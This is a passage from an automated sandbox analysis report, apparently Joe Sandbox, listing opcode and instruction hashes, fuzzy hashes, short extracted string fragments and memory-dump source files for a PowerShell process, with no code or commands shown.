                                                                                                                                                                        • Opcode ID: 5d9cf722c6aaa0b7b14e4d665f23275250052220a2c960b7eee3c1981d7813f0
                                                                                                                                                                        • Instruction ID: 34f2899b4347e4f83f6883532928e44dbe76b9f421be95b4ff6a0283b01398d8
                                                                                                                                                                        • Opcode Fuzzy Hash: 5d9cf722c6aaa0b7b14e4d665f23275250052220a2c960b7eee3c1981d7813f0
                                                                                                                                                                        • Instruction Fuzzy Hash: EF914E75B007155BDB1AEFB4C4186BFBAE2EF84704B00891DD51AAB344EF746D0A8BC6
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$piFk$piFk$piFk$piFk$piFk$|,Hk$r~l$r~l
                                                                                                                                                                        • API String ID: 0-2495246005
                                                                                                                                                                        • Opcode ID: 59b6f086eb9a10e07b13da84d45ffa7d9542d892bd99b43d7ffbbffc023ca55b
                                                                                                                                                                        • Instruction ID: e6b45e8076298d0a779c4631a24a1c7a1d50df5c65db694c912d32c91bac1277
                                                                                                                                                                        • Opcode Fuzzy Hash: 59b6f086eb9a10e07b13da84d45ffa7d9542d892bd99b43d7ffbbffc023ca55b
                                                                                                                                                                        • Instruction Fuzzy Hash: B2225BB17042268FCB259F6885417AEBBF1BF89311F06807AE805CB2D1DB31DC56D7A2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                                                        • API String ID: 0-1420252700
                                                                                                                                                                        • Opcode ID: c38b1e5cbdb0b2243502c88ff6c850734f14c3222d253f97ac386a2599574d75
                                                                                                                                                                        • Instruction ID: 0a8f8c85d4cf0d5fa82fee7780bf708bef9f062c76cb4a1045146fa8a23c3d69
                                                                                                                                                                        • Opcode Fuzzy Hash: c38b1e5cbdb0b2243502c88ff6c850734f14c3222d253f97ac386a2599574d75
                                                                                                                                                                        • Instruction Fuzzy Hash: B61279B17042658FCB169B7888117AABFA2AFC5311F14847AD905CF2C1DB31DC97D7A2
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tl$tl
                                                                                                                                                                        • API String ID: 0-4124954608
                                                                                                                                                                        • Opcode ID: 74ab59f3a6e6b3fea064a062a36b206103b64588cbd3651955fb174ca221e6e6
                                                                                                                                                                        • Instruction ID: 4f086179b3496d6672fe4608ab6d3c2b86826dbe6387f63c6e83ed9b7d3ef2c3
                                                                                                                                                                        • Opcode Fuzzy Hash: 74ab59f3a6e6b3fea064a062a36b206103b64588cbd3651955fb174ca221e6e6
                                                                                                                                                                        • Instruction Fuzzy Hash: 72B17BB1B0026DAFCB15DF69C4407AABBF2AFC6211F18C07AD4058B281DB31D956E7A1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l$tM~l
                                                                                                                                                                        • API String ID: 0-1733946507
                                                                                                                                                                        • Opcode ID: 2d2848a427b1914828d938047fc5818c42881a91235ffb364b0bce0f2e16118e
                                                                                                                                                                        • Instruction ID: c71387779477f9400d9bd15573ffa8f4f4357b5f85417232436e2adc28346804
                                                                                                                                                                        • Opcode Fuzzy Hash: 2d2848a427b1914828d938047fc5818c42881a91235ffb364b0bce0f2e16118e
                                                                                                                                                                        • Instruction Fuzzy Hash: BD51FF75B042588FDB15DBB8C8447BEBBFAAF89300F0444A9D50ADB391DB38D901CBA1
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (bq
                                                                                                                                                                        • API String ID: 0-149360118
                                                                                                                                                                        • Opcode ID: e3bdf7180a4ad63d3bd84392e8ce090f4e2eb6c7ceec076e235d9c8c25375658
                                                                                                                                                                        • Instruction ID: 5516460ad4708681a55e863c39f26e0b4adaf81ffebdc0f6b1a806dec8bfc41c
                                                                                                                                                                        • Opcode Fuzzy Hash: e3bdf7180a4ad63d3bd84392e8ce090f4e2eb6c7ceec076e235d9c8c25375658
                                                                                                                                                                        • Instruction Fuzzy Hash: 75414934B042048FDB14DBA8C558ABEBBF6EF8D715F2454A9E806AB391DB35DC01CB61
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: piFk
                                                                                                                                                                        • API String ID: 0-1899945852
                                                                                                                                                                        • Opcode ID: a1a56ea5f15a1e5f6068523ab2a18ca5a96855199b06d23ef92f10ddeb39e276
                                                                                                                                                                        • Instruction ID: 4a5aeffa0c7c49b57f3beed64c87cf96f10ed3b231209e0f69d32630dbb055ff
                                                                                                                                                                        • Opcode Fuzzy Hash: a1a56ea5f15a1e5f6068523ab2a18ca5a96855199b06d23ef92f10ddeb39e276
                                                                                                                                                                        • Instruction Fuzzy Hash: F731B074E006059FCB14DF79D598AAEBBF2FF88305F108628E41AA7390DB30AD05CB91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: piFk
                                                                                                                                                                        • API String ID: 0-1899945852
                                                                                                                                                                        • Opcode ID: 47e243b528558c481dbc31362beca3194e6ee6090573951080714021bbd57b9d
                                                                                                                                                                        • Instruction ID: b8b509c6c55edaf197884664f73fd235aa74446bf1310153e1712cc4c437fa4d
                                                                                                                                                                        • Opcode Fuzzy Hash: 47e243b528558c481dbc31362beca3194e6ee6090573951080714021bbd57b9d
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D317E74A006158FCB14DF69D598A9EBBF2FF88305F148528E41AA7394DB30AC05CB91
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (&^q
                                                                                                                                                                        • API String ID: 0-2067289071
                                                                                                                                                                        • Opcode ID: f89c8b94ce7513f34ccc29f5d00754144a70e01bc868fa3f9c2c81eee1a484c8
                                                                                                                                                                        • Instruction ID: 926ea5eed1f7b19c28ab0f5ad37066afcf6cbe3eb20130bd8bad6256aaa4bf46
                                                                                                                                                                        • Opcode Fuzzy Hash: f89c8b94ce7513f34ccc29f5d00754144a70e01bc868fa3f9c2c81eee1a484c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 5A21B071A042588FCB14DFAED404BAFBFF5EB89324F14846AD419E7340CB3599058FA5
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: tM~l
                                                                                                                                                                        • API String ID: 0-1222872911
                                                                                                                                                                        • Opcode ID: 1da7559055b40c502e606b6d041ceb1e1ea076f8146277f4ad9fbf228158ddb8
                                                                                                                                                                        • Instruction ID: 5b07475d944e721696138c903eb410177574aac42647274a1bb62ea782331b62
                                                                                                                                                                        • Opcode Fuzzy Hash: 1da7559055b40c502e606b6d041ceb1e1ea076f8146277f4ad9fbf228158ddb8
                                                                                                                                                                        • Instruction Fuzzy Hash: B021CE30A043548FCF21DFB8D8446BE7FFAAF4620070445AAE955C7361DB74D904CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8b320fc1ffa0dc18bc4691545b0a5a4a5fd94f8905ec020bde9a74592884c4bd
                                                                                                                                                                        • Instruction ID: 1fb8a9025604498dd61389499bc9a72935c2b43d2617e3002780680a2d33bb5c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8b320fc1ffa0dc18bc4691545b0a5a4a5fd94f8905ec020bde9a74592884c4bd
                                                                                                                                                                        • Instruction Fuzzy Hash: C7B11934E012489FDB14CFA8D588AADFBF2BF89314F258559E809AB351C771ED41CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 9a3cbbcf9d347e40dd66885a125e159f4c86d5565cc9f93a0e1c2f84c0c1a6b4
                                                                                                                                                                        • Instruction ID: 84d6428ae77fe637f4a1ae1f84ca53f8a670dd740ca597d07f83da342f4b6037
                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3cbbcf9d347e40dd66885a125e159f4c86d5565cc9f93a0e1c2f84c0c1a6b4
                                                                                                                                                                        • Instruction Fuzzy Hash: 6D913C74A006468FCB15CF58C498ABEFBF2FF48314B248599D915AB3A5C736EC51CB90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2c172226acae7442b3bee0eca36e5d985fb581553b82d925dc371b1bd3ecf3e1
                                                                                                                                                                        • Instruction ID: c7eee7f4c89c54100f9204bbf7e44d13c1db0b82b9ee9d347fc5feaa7639ca63
                                                                                                                                                                        • Opcode Fuzzy Hash: 2c172226acae7442b3bee0eca36e5d985fb581553b82d925dc371b1bd3ecf3e1
                                                                                                                                                                        • Instruction Fuzzy Hash: B0611771E002489FCB14DFA9D598A9DFBF6EF88314F188169E809AB354EB349941CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 08deba3d375d7986370fbc0e8f639b91a01c644a31f78948b685a89942d298c4
                                                                                                                                                                        • Instruction ID: b4b214a928acff78c9493c6e7a11d721a984f60986695d0d0bffab979a9c5408
                                                                                                                                                                        • Opcode Fuzzy Hash: 08deba3d375d7986370fbc0e8f639b91a01c644a31f78948b685a89942d298c4
                                                                                                                                                                        • Instruction Fuzzy Hash: C951B0753002059FD714DBA9D888A7AB7EAFFC9219F1488A9D509CB351EB35EC01CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5c2122fef956538b8d3b5d735dcdc9f6ec1cd6ab245911a75e3177069bba25f2
                                                                                                                                                                        • Instruction ID: fe80c444ffeac161ad143103b7c8eaf46ec18c2db15c47a1c6a25724c2f6bb6c
                                                                                                                                                                        • Opcode Fuzzy Hash: 5c2122fef956538b8d3b5d735dcdc9f6ec1cd6ab245911a75e3177069bba25f2
                                                                                                                                                                        • Instruction Fuzzy Hash: 3B5139B5E002489FCB14CFA9D598B9DFBF6EF88314F188069E809EB354EB349945CB50
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 159e0d7dfcc6594e0628643570960cb8b6bd17948a876ae03c17c1962b774d8c
                                                                                                                                                                        • Instruction ID: 93dfda182af6ca7c9c0f97f1e4cf68179a5ab078d51398fc5734fae52879014c
                                                                                                                                                                        • Opcode Fuzzy Hash: 159e0d7dfcc6594e0628643570960cb8b6bd17948a876ae03c17c1962b774d8c
                                                                                                                                                                        • Instruction Fuzzy Hash: 944174B87102058FDB10DF6DC598E2EBBEAEF8831475484A9E489CF355EB31EC058B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0581968d7b2ed9c6c81ddedc5aba6f4706110b1021a0218c8ca4838c18aca209
                                                                                                                                                                        • Instruction ID: d282679ae293dc500512ccd590f502200d18016c096f34d1be8c509d08d98602
                                                                                                                                                                        • Opcode Fuzzy Hash: 0581968d7b2ed9c6c81ddedc5aba6f4706110b1021a0218c8ca4838c18aca209
                                                                                                                                                                        • Instruction Fuzzy Hash: A851ECB4704B09CFC358DA2C8149536B7E3BB956407D68D69E0A7CBB01EA38FC46CB52
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 76c6f4874148495c2b3857cfd9b4fd28ae4760b7fa1db62995aa730b4f882caa
                                                                                                                                                                        • Instruction ID: 8ecbb8f3e6d1a487e74f9724ac9d887b767e57fcb2c9794cac95869ab03f215d
                                                                                                                                                                        • Opcode Fuzzy Hash: 76c6f4874148495c2b3857cfd9b4fd28ae4760b7fa1db62995aa730b4f882caa
                                                                                                                                                                        • Instruction Fuzzy Hash: A34133B87102058FDB10DF6DC598D2ABBEAEF8C314B548459E589CF355EB70EC058B91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1770559728.0000000007120000.00000040.00000800.00020000.00000000.sdmp, Offset: 07120000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7120000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 90f45a0233c3edfdf8278bd45fc7c398d7ae582aedf48f42f936354e9ac50e33
                                                                                                                                                                        • Instruction ID: 51d7719d94b14904438d343ce7c5581d0dd9c90efb45ad1a2f592873c9e2197d
                                                                                                                                                                        • Opcode Fuzzy Hash: 90f45a0233c3edfdf8278bd45fc7c398d7ae582aedf48f42f936354e9ac50e33
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C414BF1A002119FCB268F64C50166A7BB3AF84300F498495D9119F3D2D739EC5BE7B1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 23d0134e23381eeef290d504bce5c5f35177d07d2ad0d86822cb3b4104a752a5
                                                                                                                                                                        • Instruction ID: 61c34b40bf0bfe4d958752313b81680b9773fd61f2d356fd3741857e06a9dcf4
                                                                                                                                                                        • Opcode Fuzzy Hash: 23d0134e23381eeef290d504bce5c5f35177d07d2ad0d86822cb3b4104a752a5
                                                                                                                                                                        • Instruction Fuzzy Hash: D4413AB4A006069FCB06CF58C498ABAFBF1FF48314B158199D815AB365C736FC51CBA0
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f35f028bc485902ae119381c665008fcf16907af91ced9ffe38d3651147f76ed
                                                                                                                                                                        • Instruction ID: afdaf0ff1d44af9d040955fb2c231a0c87f8869ff9257ae4d03a964c61721bba
                                                                                                                                                                        • Opcode Fuzzy Hash: f35f028bc485902ae119381c665008fcf16907af91ced9ffe38d3651147f76ed
                                                                                                                                                                        • Instruction Fuzzy Hash: 6831A0753006119FD705EB78E888BAAB7D6EFC9326F048629E509CB350DF74A845CBA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a9636a45622b5748e4bed7f83cd8b0aa9f0a08182d725fe4a60492548deeb75d
                                                                                                                                                                        • Instruction ID: 6a275dc0f8879ff0b71f6d5e0d27562a995a89344ec1589a4fd7c5b47718f638
                                                                                                                                                                        • Opcode Fuzzy Hash: a9636a45622b5748e4bed7f83cd8b0aa9f0a08182d725fe4a60492548deeb75d
                                                                                                                                                                        • Instruction Fuzzy Hash: C741D634E01249DFDB15CBA8D588AADFBF2AF88304F24C559E404AB365C771AD82CF90
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 5aff257d9c0d6c77f411d4658e31ab0863af0b9c43dcf8067d0a2ffe5cb81920
                                                                                                                                                                        • Instruction ID: b0a8e0489a48aa94d79c172a8e42ae7662f0c16b6c97c6bceb2a05740063ea67
                                                                                                                                                                        • Opcode Fuzzy Hash: 5aff257d9c0d6c77f411d4658e31ab0863af0b9c43dcf8067d0a2ffe5cb81920
                                                                                                                                                                        • Instruction Fuzzy Hash: 11310E34A002058FDB14CBA4D598AFEBBF6EF8D719F185468E806AB351DB35DC41CB60
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e1d04dfbcfd00b7b88d0e58700d712aea1a376c613614747faeaccb055872224
                                                                                                                                                                        • Instruction ID: 10e0bdf586bfe4bea188968dd81bca449b72539548b8a3ebe52109af1b11ae33
                                                                                                                                                                        • Opcode Fuzzy Hash: e1d04dfbcfd00b7b88d0e58700d712aea1a376c613614747faeaccb055872224
                                                                                                                                                                        • Instruction Fuzzy Hash: 0D314BB1A006099FDB05DFA9D4987BEBBF6AF88310F148029E415E7350EB789C418BA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 17a12933e6cfc963f3a854ec10c1cf75e653c8c5f592c9c79490a707c412461b
                                                                                                                                                                        • Instruction ID: 9cb798c9e48fd9575a0af8f709ba29a428102ba6ee12f49afbf18d07e8fee448
                                                                                                                                                                        • Opcode Fuzzy Hash: 17a12933e6cfc963f3a854ec10c1cf75e653c8c5f592c9c79490a707c412461b
                                                                                                                                                                        • Instruction Fuzzy Hash: B331A4B8E002059FDB04EF64D859ABEBBF3EF84300F1184A9D115AB395DA399D01CFA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 347d02823cda1f0f0949cee282cf9f6c986db21cde92f64b0449dbe07da73f71
                                                                                                                                                                        • Instruction ID: 5a517f67b8315deee2e11a6a57de2817f51fb415f9eab7638d498f2fb8effcc1
                                                                                                                                                                        • Opcode Fuzzy Hash: 347d02823cda1f0f0949cee282cf9f6c986db21cde92f64b0449dbe07da73f71
                                                                                                                                                                        • Instruction Fuzzy Hash: 84315E75A002148FCB04DF68D458AAEBBF2EF88314F144969D406E73A0DF35AC45CF51
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ec590d41f8eeaa39ac330e1cde9b510fb803d7634f004bd419c1ab8a967490fa
                                                                                                                                                                        • Instruction ID: a4a4c27df853eae045901c872f0af6edbd5f096cc05f4a3893eb13ad5bb918e9
                                                                                                                                                                        • Opcode Fuzzy Hash: ec590d41f8eeaa39ac330e1cde9b510fb803d7634f004bd419c1ab8a967490fa
                                                                                                                                                                        • Instruction Fuzzy Hash: AD312CB1A002099FDB05DFA9D4987BEBBF6AF89354F148029E515E7350EB789C018BA1
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: e692a25e498090aa14f43a13d302ea6793c29cff5ef5d92e36540364863f4400
                                                                                                                                                                        • Instruction ID: be760797aac15cfbf94349bd6a729a09c152f18d59e925d2124132dbc1ecee29
                                                                                                                                                                        • Opcode Fuzzy Hash: e692a25e498090aa14f43a13d302ea6793c29cff5ef5d92e36540364863f4400
                                                                                                                                                                        • Instruction Fuzzy Hash: 9431BAB59057048EEB60CF6AD0883EAFBF6EB88320F28C42ED85D97600DB745481CB61
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7f425dc00b912c58b4e370a3b9a9d4083963f37a4555c123ded17d98bb45e8db
                                                                                                                                                                        • Instruction ID: 0f798ad242efbaf98ec308383fe95d6a5a2bdde55e5d49483b691bf14a3c21d7
                                                                                                                                                                        • Opcode Fuzzy Hash: 7f425dc00b912c58b4e370a3b9a9d4083963f37a4555c123ded17d98bb45e8db
                                                                                                                                                                        • Instruction Fuzzy Hash: DE314978A002148FCB14DF68D458AAEBBF2AF88314F148969D406EB3A0DF30AC45CB91
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000004.00000002.1760969494.0000000002960000.00000040.00000800.00020000.00000000.sdmp, Offset: 02960000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_4_2_2960000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f6ebf35eab275e03357056188aeb9cbbf803293bf59953d71a9695521db93d45
                                                                                                                                                                        • Instruction ID: 62448700161760491ac5b67eded29ae15306362e1a1ba9f065fbac20eb6113c2
                                                                                                                                                                        • Opcode Fuzzy Hash: f6ebf35eab275e03357056188aeb9cbbf803293bf59953d71a9695521db93d45
